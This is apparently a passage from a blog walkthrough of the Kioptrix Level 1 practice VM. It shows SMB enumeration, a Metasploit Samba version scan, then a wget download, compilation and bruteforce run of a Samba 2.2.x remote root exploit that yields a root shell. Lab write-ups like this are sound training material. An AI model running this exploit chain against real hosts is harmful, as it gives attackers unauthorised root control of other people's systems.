 |    Target Information    |
  ==========================
 Target ........... 192.168.1.104
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 
 
  =====================================================
 |    Enumerating Workgroup/Domain on 192.168.1.104    |
  =====================================================
 [+] Got domain/workgroup name: MYGROUP
 
  =============================================
 |    Nbtstat Information for 192.168.1.104    |
  =============================================
 Looking up status of 192.168.1.104
     KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
     KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
     KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
     ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
     MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
     MYGROUP         <1d> -         B <ACTIVE>  Master Browser
     MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
 
     MAC Address = 00-00-00-00-00-00
 
  ======================================
 |    Session Check on 192.168.1.104    |
  ======================================
 [E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
unfortunately the above scan did not gave the version of samba so  i am going to use metasploit auxiliary module to get the samba version
 msf5 > search scanner/smb
 msf5 > use auxiliary/scanner/smb/smb_version
 msf5 auxiliary(scanner/smb/smb_version) > show options
 
 Module options (auxiliary/scanner/smb/smb_version):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    RHOSTS                      yes       The target address range or CIDR identifier
    SMBDomain  .                no        The Windows domain to use for authentication
    SMBPass                     no        The password for the specified username
    SMBUser                     no        The username to authenticate as
    THREADS    1                yes       The number of concurrent threads
 
 msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.104
 RHOSTS => 192.168.1.104
 msf5 auxiliary(scanner/smb/smb_version) > run
 
 [*] 192.168.1.104:139     - Host could not be identified: Unix (Samba 2.2.1a)
 [*] 192.168.1.104:445     - Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
The version of samba version is samba 2.2.1a, now by searching "samba 2.2.1a vulnerability" i found "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution" exploit at https://www.exploit-db.com/exploits/10

Now from here download and try the exploit.
 $ wget https://www.exploit-db.com/raw/10
 $ mv 10 sambal.c
 $ gcc -o sambal sambal.c
 $ ./sambal
 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
 --------------------------------------------------------------
 Usage: ./sambal [-bBcCdfprsStv] [host]
 
 -b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
 -B <step>       bruteforce steps (default = 300)
 -c <ip address> connectback ip address
 -C <max childs> max childs for scan/bruteforce mode (default = 40)
 -d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
 -f              force
 -p <port>       port to attack (default = 139)
 -r <ret>        return address
 -s              scan mode (random)
 -S <network>    scan mode
 -t <type>       presets (0 for a list)
 -v              verbose mode
 
 $ ./sambal -b 0 -v 192.168.1.104
 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
 --------------------------------------------------------------
 + Verbose mode.
 + Bruteforce mode. (Linux)
 + Host is running samba.
 + Using ret: [0xbffffed4]
 + Using ret: [0xbffffda8]
 + Using ret: [0xbffffc7c]
 + Using ret: [0xbffffb50]
 + Worked!
 --------------------------------------------------------------
 *** JE MOET JE MUIL HOUWE
 Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
 uid=0(root) gid=0(root) groups=99(nobody)
 ls
 exploit
 whoami
 root
and exploit works.

So we have to methods to get root shell in kioptrix1.1.
Read more »
Subscribe to: Posts (Atom)